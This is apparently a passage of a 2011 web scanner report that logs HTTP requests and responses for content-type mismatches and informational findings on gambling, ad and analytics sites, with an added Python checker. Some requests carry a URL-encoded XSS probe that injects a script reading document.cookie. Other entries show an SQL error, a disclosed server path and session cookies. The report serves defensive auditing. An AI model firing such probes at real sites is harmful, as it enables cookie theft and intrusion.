<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

25.22. http://www.neogames.com/outbound/article/www.winnings.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.neogames.com
Path:   /outbound/article/www.winnings.com

Request

GET /outbound/article/www.winnings.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

25.23. http://www.primescratchcards.com/track/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /track/

Request

GET /track/ HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 12:34:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
p3p: policyref="/w3c/p3p.xml"
Content-Length: 418
Content-Type: text/html
Cache-control: private

<html>
<head>
<link rel="p3pv1" href="/w3c/p3p.xml"></link>
</head>
<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80040e14'</fon
...[SNIP]...

25.24. http://www.verisign.co.uk/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.co.uk
Path:   /

Request

GET / HTTP/1.1
Host: www.verisign.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:15 GMT
Server: Apache
Set-Cookie: v1st=3D2EA54A28A1F00A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk
Set-Cookie: v1st=3D2EA54A28A1F00A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 29123

<!DOCTYPE html>
<html lang="">
   <head>
       <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea
...[SNIP]...

25.25. http://www.winnings.com/wp-admin/admin-ajax.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /wp-admin/admin-ajax.php

Request

GET /wp-admin/admin-ajax.php HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html
Expires: Sat, 26 Jul 1997 05:00:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Date: Mon, 16 May 2011 12:35:30 GMT
Connection: close
Content-Length: 2

-1

26. Content type incorrectly stated
There are 18 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-Type header which correctly and unambiguously states the MIME type of the content in the response body. Sending X-Content-Type-Options: nosniff alongside it stops browsers from second-guessing that declaration, which matters most where the body carries user-controllable data.
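The background above describes the mismatch only in general terms. What follows is an added example, not scanner output and not code from any of the sites listed in this report: a small checker that classifies a response body from its bytes alone (magic signatures, JSON/JSONP shape, markup root element, script keywords) and compares that with the declared Content-Type, the way the verdicts in 26.1 to 26.13 are reached. Function names, the compatibility table and the SAMPLES dictionary are this example's own choices; the sample bodies are constructed to mirror the findings in this section and are not captured traffic.

```python
import json
import re

# Constructed checker: declared Content-Type versus what the body actually is.
_MAGIC = [(b"\x89PNG\r\n\x1a\n", "png"), (b"GIF87a", "gif"), (b"GIF89a", "gif")]
# JSONP: one JavaScript identifier (dots allowed) wrapping a JSON value.
_JSONP_RE = re.compile(r"^\s*[A-Za-z_$][\w$.]*\s*\((.*)\)\s*;?\s*$", re.S)
_JS_KEYWORD_RE = re.compile(r"\b(eval|function|var|let|const|document|window)\b")
_FIRST_TAG_RE = re.compile(r"<(!?[A-Za-z][\w:-]*)([^>]*)>")
_HTML_TAGS = {"html", "head", "body", "meta", "link", "script", "title", "br", "b",
              "p", "div", "span", "font", "center", "table", "a", "img"}
# What each declared MIME type claims to carry.
_DECLARED = {"image/png": "png", "image/gif": "gif", "application/json": "json",
             "text/javascript": "javascript", "application/javascript": "javascript",
             "application/x-javascript": "javascript", "text/html": "html",
             "text/xml": "xml", "application/xml": "xml", "text/plain": "text"}
# Sniffed kinds accepted under a declared kind; anything else is a mismatch.
_COMPATIBLE = {"javascript": {"javascript", "jsonp"},
               "text": {"text", "json", "jsonp", "javascript", "html", "xml"}}


def _sniff_markup(text):
    if text[:5].lower() == "<?xml":
        return "xml"
    m = _FIRST_TAG_RE.match(text)
    if not m:
        return "text"
    name, attrs = m.group(1).lower(), m.group(2).lower()
    if name == "!doctype":
        return "html" if "html" in attrs else "xml"
    if name == "html":
        return "html"  # XHTML carries xmlns too; it is still HTML
    if "xmlns=" in attrs:
        return "xml"  # namespaced root (P3P's META), not the HTML tag of the same name
    return "html" if name in _HTML_TAGS else "xml"


def sniff_body(body):
    """Classify a body by content alone, ignoring any declared header."""
    for magic, kind in _MAGIC:
        if body.startswith(magic):
            return kind
    try:
        text = body.decode("utf-8").strip()
    except UnicodeDecodeError:
        return "binary"
    try:
        json.loads(text)
        return "json"
    except ValueError:
        pass
    m = _JSONP_RE.match(text)
    if m:
        try:
            json.loads(m.group(1))
            return "jsonp"  # callback(<json>) is script, not JSON
        except ValueError:
            pass
    if text.startswith("<"):
        return _sniff_markup(text)
    return "javascript" if _JS_KEYWORD_RE.search(text) else "text"


def check_response(headers, body):
    """headers is a list of (name, value) pairs so duplicate headers stay visible."""
    cts = [v for k, v in headers if k.lower() == "content-type"]
    if len(cts) == 1:
        mime = cts[0].split(";", 1)[0].strip().lower()
        declared = _DECLARED.get(mime, "unknown")
    else:
        mime, declared = None, ("missing" if not cts else "ambiguous")
    actual = sniff_body(body)
    consistent = None  # cannot judge without exactly one recognised declaration
    if declared not in ("unknown", "missing", "ambiguous"):
        consistent = actual in _COMPATIBLE.get(declared, {declared})
    nosniff = any(k.lower() == "x-content-type-options" and v.strip().lower() == "nosniff"
                  for k, v in headers)
    return {"declared_mime": mime, "declared": declared, "actual": actual,
            "consistent": consistent, "nosniff": nosniff}


# Constructed samples modelled on the bodies shown in this section (not captured traffic).
SAMPLES = {
    "gif_as_png": ([("Content-Type", "image/png")],
                   b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff;"),
    "jsonp_as_json": ([("Content-Type", "application/json; charset=utf-8")],
                      b"TWTR.Widget.receiveCallback_1([]);"),
    "text_as_html": ([("Content-Type", "text/html")], b"Hmm."),
    "p3p_as_xml": ([("Content-Type", "text/xml")],
                   b'<META xmlns="http://www.w3.org/2002/01/P3Pv1"><POLICY-REFERENCES>'
                   b'<EXPIRY max-age="86400"/></POLICY-REFERENCES></META>'),
    "jsonp_as_js": ([("Content-Type", "text/javascript; charset=utf-8")],
                    b"__verify_callback_383465103788(2)"),
    "php_warning_as_html": ([("Content-Type", "text/html")],
                            b"<br />\n<b>Deprecated</b>: Function split() is deprecated "
                            b"in <b>redirects.php</b> on line <b>2</b><br />"),
}


def run_samples():
    return {name: check_response(h, b) for name, (h, b) in SAMPLES.items()}
```

Run against the samples, only the PNG-declared GIF, the JSONP served as application/json and the bare string under text/html come back inconsistent; the P3P file, the DoubleVerify callback and the PHP warning are what their headers say, which is why several of the scanner verdicts below deserve a second look before being reported. The nosniff flag is carried in the result so a mismatch on a response that also sets X-Content-Type-Options: nosniff can be triaged lower than one the browser is free to reinterpret.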


26.1. http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/Metacafe/lists/metacafe/statuses.json

Issue detail

The response contains the following Content-type statement: Content-Type: application/json; charset=utf-8. The response states that it contains JSON. However, it actually appears to contain plain text. The body shown below, TWTR.Widget.receiveCallback_1([]);, is a JSONP callback invocation, which is script rather than JSON: the function name is echoed from the request's callback parameter, so the label application/json understates what a browser loading this URL in a script tag will execute.

Request

GET /1/Metacafe/lists/metacafe/statuses.json?callback=TWTR.Widget.receiveCallback_1&since_id=69500306433642497&refresh=true&include_rts=true&clientsource=TWITTERINC_WIDGET&1305550177135=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; guest_id=130530556419951159; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305412459.2; original_referer=ZLhHHTiegr%2BuELNlzhqsTmXCAErbgtcXGmlVl75vKClzAZioSrWmX1f0QknK5wh8oE41IPFgvC8H5lwFMcpBvsbGUrM2CLCfSyyLTsrrntY99PQJLtdZtZXzC2SKRGyfMlLDL2xkw2ifyAgy%2BYKs1A%3D%3D; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCPzA2vgvAToHaWQiJWJmNzU0NzkwYWZlMmZk%250AMDZhYTUxMTQyNzdkYWUyOTE4IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--e4fe7cf752483e5c3dbc1d51b7dbc81b4f38de89

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:50:02 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305550202-60759-7402
X-RateLimit-Limit: 150
ETag: "c4496a2500a04acae94431807a040161"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 16 May 2011 12:50:02 GMT
X-RateLimit-Remaining: 107
X-Runtime: 0.03023
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114be3e990c
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: d1402f3982f2137670a644c4f3d02221f99884bf
X-RateLimit-Reset: 1305553776
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCPzA2vgvASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWJm%250ANzU0NzkwYWZlMmZkMDZhYTUxMTQyNzdkYWUyOTE4--4dc18f7bed0dbd2680bab894334a9a8d73dfd64f; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 34

TWTR.Widget.receiveCallback_1([]);

26.2. http://in.getclicky.com/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://in.getclicky.com
Path:   /

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text: the four-byte body "Hmm." contains no markup and no user-supplied data, so the mislabelling is harmless here.

Request

GET / HTTP/1.1
Host: in.getclicky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cluid=6787569821139589215;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:39:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Length: 4
Connection: close
Content-Type: text/html

Hmm.

26.3. https://in.getclicky.com/

Summary

Severity:   Information
Confidence:   Firm
Host:   https://in.getclicky.com
Path:   /

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text: this is the same four-byte "Hmm." body as 26.2, served over HTTPS, and is equally harmless.

Request

GET / HTTP/1.1
Host: in.getclicky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cluid=6787569821139589215;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Length: 4
Connection: close
Content-Type: text/html

Hmm.

26.4. http://neogames-tech.com/outbound/article/www.lga.org.mt

Summary

Severity:   Information
Confidence:   Firm
Host:   http://neogames-tech.com
Path:   /outbound/article/www.lga.org.mt

Issue detail

The response contains the following Content-type statement: Content-type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text. The body is in fact a PHP "Deprecated" warning wrapped in br and b tags; the more useful observation is that the outbound redirect never happens and the response discloses the absolute server path D:\Neogames\Websites\Neogames.com\redirects.php together with the PHP version in the X-Powered-By header.

Request

GET /outbound/article/www.lga.org.mt HTTP/1.1
Host: neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250931097.1305545979.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250931097.1972721854.1305545979.1305545979.1305545979.1; __utmc=250931097; __utmb=250931097.3.10.1305545979;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:27:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

26.5. http://rtb50.doubleverify.com/rtb.ashx/verifyc

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rtb50.doubleverify.com
Path:   /rtb.ashx/verifyc

Issue detail

The response contains the following Content-type statement: Content-Type: text/javascript; charset=utf-8. The response states that it contains script. However, it actually appears to contain plain text. The body __verify_callback_383465103788(2) is a JSONP callback invocation and therefore valid script, so the declared type is correct; the scanner's verdict reflects its heuristic, not a real mismatch. Note that the function name is echoed from the request's callback parameter.

Request

GET /rtb.ashx/verifyc?ctx=741233&cmp=5384441&plc=62171182&sid=1037707&num=5&ver=2&dv_url=http%3A//ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg%3Bpos%3Dfooter%3Bsz%3D728x90%3Batf%3Dno%3Bname%3Dleaderboardfooter%3BpageURL%3Dwww.metacafe.com%252Ffplayer%252F%253F4702d%2522%253E%253Cscript%253Ealert%2528document.cookie%2529%253C%252Fscript%253Ebe96a23f3a3%253D1%3Bstudio%3Dnull%3Bsection%3Dnull%3Bcategory%3Dnull%3Bchannel%3Dnull%3Brating%3Dclean%3Bhd%3Dno%3Benv%3Dprod%3Bbranding%3Dnull%3Bfbconnected%3Dfalse%3Bffilter%3Dtrue%3Breferrer%3Dnull%3BLEID%3D40%3Btile%3D9%3Bord%3D4284276430058379&callback=__verify_callback_383465103788 HTTP/1.1
Host: rtb50.doubleverify.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Date: Mon, 16 May 2011 12:51:57 GMT
Connection: close
Content-Length: 33

__verify_callback_383465103788(2)

26.6. https://secure.neogames-tech.com/ScratchCards/images/seal_background.png

Summary

Severity:   Information
Confidence:   Firm
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/images/seal_background.png

Issue detail

The response contains the following Content-type statement: Content-Type: image/png. The response states that it contains a PNG image. However, it actually appears to contain a GIF image: the 54-byte body begins with the GIF89a signature rather than the PNG signature. Browsers sniff image formats, so the file still renders, but this is a genuine mismatch between the file extension, the header and the content.

Request

GET /ScratchCards/images/seal_background.png HTTP/1.1
Host: secure.neogames-tech.com
Connection: keep-alive
Referer: https://secure.neogames-tech.com/ScratchCards/Lobby.aspx?CSI=1&CUR=GBP&LNG=~ENG&AFI=&MMI=0&CKI=&AR=&PAR=&RegistrationMode=PM&BO=FM&SDN=Scratch2Cash.com&__utma=-&__utmb=171482274.1.10.1305548356&__utmc=171482274&__utmx=-&__utmz=-&__utmv=-&__utmk=22205543
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=250931097.1305545979.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250931097.1972721854.1305545979.1305545979.1305545979.1; __utmc=250931097; ASP.NET_SessionId=5p03ge55er42ijbnracipjyy

Response

HTTP/1.1 200 OK
Content-Length: 54
Content-Type: image/png
Last-Modified: Sun, 02 May 2010 11:59:30 GMT
Accept-Ranges: bytes
ETag: "eae5f8ebeee9ca1:1396"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:19:28 GMT

GIF89a..(................!.......,......(........-.
.;

26.7. http://server.iad.liveperson.net/hcp/html/mTag.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://server.iad.liveperson.net
Path:   /hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement: Content-Type: application/x-javascript. The response states that it contains script. However, it actually appears to contain unrecognised content. The body is a packed script beginning eval((function(s){ ... , which is JavaScript as declared; the "unrecognised" verdict is the scanner failing to recognise obfuscated code, not a content-type error.

Request

GET /hcp/html/mTag.js?site=15712222 HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.mundirasca.com/Home.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Content-Length: 17291
Content-Type: application/x-javascript
Content-Location: http://server.iad.liveperson.net/lpWeb/default_SMB//hcpv/emt/mtag.js?site=15712222
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:2736"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:41:46 GMT

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

26.8. http://trk.primescratchcards.com/w3c/p3p.xml

Summary

Severity:   Information
Confidence:   Firm
Host:   http://trk.primescratchcards.com
Path:   /w3c/p3p.xml

Issue detail

The response contains the following Content-type statement: Content-Type: text/xml. The response states that it contains XML. However, it actually appears to contain HTML. The body is a P3P policy reference file whose root element is META in the http://www.w3.org/2002/01/P3Pv1 namespace; the HTML verdict comes from the tag name alone, and the content is XML as declared.

Request

GET /w3c/p3p.xml HTTP/1.1
Host: trk.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDQQBCDAQB=BJEGLCIAEIAOPPLGIKGGAJPK;

Response

HTTP/1.1 200 OK
Content-Length: 1262
Content-Type: text/xml
Last-Modified: Wed, 02 Sep 2009 12:12:30 GMT
Accept-Ranges: bytes
ETag: "ec6bd1a4c62bca1:1bca"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:41 GMT
Connection: close

<META xmlns="http://www.w3.org/2002/01/P3Pv1"><POLICY-REFERENCES><EXPIRY max-age="86400"/><POLICY-REF about="#privacy1"><INCLUDE>/*</INCLUDE><COOKIE-INCLUDE name="*" value="*" domain="*" path="*"/></P
...[SNIP]...

26.9. http://www.neogames.com/outbound/article/crazyscratch.com

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.neogames.com
Path:   /outbound/article/crazyscratch.com

Issue detail

The response contains the following Content-type statement: Content-type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text. As in 26.4, the body is a PHP "Deprecated" warning in br and b tags, the redirect to the outbound target does not occur, and the absolute path D:\Neogames\Websites\Neogames.com\redirects.php is disclosed.

Request

GET /outbound/article/crazyscratch.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

26.10. http://www.neogames.com/outbound/article/karamba.com

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.neogames.com
Path:   /outbound/article/karamba.com

Issue detail

The response contains the following Content-type statement: Content-type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text. Same PHP "Deprecated" warning and server path disclosure as 26.4; the redirect to the outbound target does not occur.

Request

GET /outbound/article/karamba.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

26.11. http://www.neogames.com/outbound/article/mundirasca.com

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.neogames.com
Path:   /outbound/article/mundirasca.com

Issue detail

The response contains the following Content-type statement: Content-type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text. Same PHP "Deprecated" warning and server path disclosure as 26.4; the redirect to the outbound target does not occur.

Request

GET /outbound/article/mundirasca.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

26.12. http://www.neogames.com/outbound/article/norgesloddet.com

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.neogames.com
Path:   /outbound/article/norgesloddet.com

Issue detail

The response contains the following Content-type statement: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /outbound/article/norgesloddet.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

26.13. http://www.neogames.com/outbound/article/scratch.betsson.com

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.neogames.com
Path:   /outbound/article/scratch.betsson.com

Issue detail

The response contains the following Content-type statement: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /outbound/article/scratch.betsson.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

26.14. http://www.neogames.com/outbound/article/www.crazyscratch.com

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.neogames.com
Path:   /outbound/article/www.crazyscratch.com

Issue detail

The response contains the following Content-type statement: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /outbound/article/www.crazyscratch.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

26.15. http://www.neogames.com/outbound/article/www.interwetten.com

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.neogames.com
Path:   /outbound/article/www.interwetten.com

Issue detail

